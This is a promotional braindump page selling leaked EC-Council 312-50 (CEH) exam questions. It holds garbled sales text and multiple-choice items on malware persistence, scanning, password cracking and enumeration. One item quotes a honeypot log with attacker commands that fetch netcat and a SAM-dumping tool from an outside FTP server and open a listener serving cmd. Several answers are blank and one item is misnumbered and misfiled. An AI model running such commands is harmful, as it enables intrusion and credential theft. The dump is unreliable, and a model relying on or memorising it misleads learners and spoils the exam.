★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW 312-50 Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/312-50-dumps.html


Many candidates get no concepts about how to prepare for the EC-Council 312-50 examination. If youre the same since them, please seek assist from Actualtests. Each of our EC-Council 312-50 exam braindumps are offered in examine guide, Pdf and also test motor formats. The actual study manual is well-organized and also structured. All the crucial points involving EC-Council exam have been contained from the study manual which is offered chapter by chapter. It?¡¥s extremely convenient and also clear for the candidates to use. The actual Pdf files are printable and also portable and the test engine software is actually downloadable. All of our own EC-Council EC-Council exam products are free accessible after purchasing. You will acquire instant access to the EC-Council 312-50 exam questions and also answers when we confirm your payment.

2021 Mar 312-50 free exam

Q271. Which of the following Registry location does a Trojan add entries to make it persistent on Windows 7? (Select 2 answers) 

A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 

B. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\System32\CurrentVersion\ Run 

C. HKEY_CURRENT_USER\Software\Microsoft\Windows\System32\CurrentVersion\Run 

D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

Answer: AD


Q272. If you perform a port scan with a TCP ACK packet, what should an OPEN port return? 

A. RST 

B. No Reply 

C. SYN/ACK 

D. FIN 

Answer:

Explanation: Open ports return RST to an ACK scan. 


Q273. Which definition among those given below best describes a covert channel? 

A. A server program using a port that is not well known. 

B. Making use of a protocol in a way it is not intended to be used. 

C. It is the multiplexing taking place on a communication link. 

D. It is one of the weak channels used by WEP which makes it insecure. 

Answer:

Explanation: A covert channel is described as: "any communication channel that can be exploited by a process to transfer information in a manner that violates the systems security policy." 

Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information. 


Q274. Which of the following represents the initial two commands that an IRC client sends to join an IRC network? 

A. USER, NICK 

B. LOGIN, NICK 

C. USER, PASS 

D. LOGIN, USER 

Answer:

Explanation: A "PASS" command is not required for either client or server connection to be registered, but it must precede the server message or the latter of the NICK/USER combination. (RFC 1459) 


Q275. Attackers footprint target Websites using Google Hacking techniques. Google hacking is a term that refers to the art of creating complex search engine queries. It detects websites that are vulnerable to numerous exploits and vulnerabilities. Google operators are used to locate specific strings of text within the search results. 

The configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. WordPress uses config.php that stores the database Username and Password. 

Which of the below Google search string brings up sites with "config.php" files? 

A. Search:index config/php 

B. Wordpress:index config.php 

C. intitle:index.of config.php 

D. Config.php:index list 

Answer: C


Renovate 312-50 test engine:

Q276. Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense’s front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. 

What tool would be best used to accomplish this? 

A. RainbowCrack 

B. SMBCrack 

C. SmurfCrack 

D. PSCrack 

Answer: A

Explanation: RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables. 

Topic 14, SQL Injection 

380. The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. 

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: 

“cmd1.exe /c open 213.116.251.162 >ftpcom” 

“cmd1.exe /c echo johna2k >>ftpcom” 

“cmd1.exe /c echo haxedj00 >>ftpcom” 

“cmd1.exe /c echo get nc.exe >>ftpcom” 

“cmd1.exe /c echo get samdump.dll >>ftpcom” 

“cmd1.exe /c echo quit >>ftpcom” 

“cmd1.exe /c ftp –s:ftpcom” 

“cmd1.exe /c nc –l –p 6969 e-cmd1.exe” 

What can you infer from the exploit given? 

A. It is a local exploit where the attacker logs in using username johna2k. 

B. There are two attackers on the system – johna2k and haxedj00. 

C. The attack is a remote exploit and the hacker downloads three files. 

D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. 

Answer: C


Q277. Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL’s (access control lists) to files or folders and also one that can be used within batch files. 

Which of the following tools can be used for that purpose? (Choose the best answer) 

A. PERM.exe 

B. CACLS.exe 

C. CLACS.exe 

D. NTPERM.exe 

Answer:

Explanation: Cacls.exe is a Windows NT/2000/XP command-line tool you can use to assign, display, or modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a command-line utility, you can also use it in batch files. 


Q278. A remote user tries to login to a secure network using Telnet, but accidently types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer) 

A. Invalid Username 

B. Invalid Password 

C. Authentication Failure 

D. Login Attempt Failed 

E. Access Denied 

Answer: AB

Explanation: As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable. 


Q279. You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c 

What is the hexadecimal value of NOP instruction? 

A. 0x60 

B. 0x80 

C. 0x70 

D. 0x90 

Answer: D


Q280. Which of the following tools are used for enumeration? (Choose three.) 

A. SolarWinds 

B. USER2SID 

C. Cheops 

D. SID2USER 

E. DumpSec 

Answer: BDE

Explanation: USER2SID, SID2USER, and DumpSec are three of the tools used for system enumeration. Others are tools such as NAT and Enum. Knowing which tools are used in each step of the hacking methodology is an important goal of the CEH exam. You should spend a portion of your time preparing for the test practicing with the tools and learning to understand their output.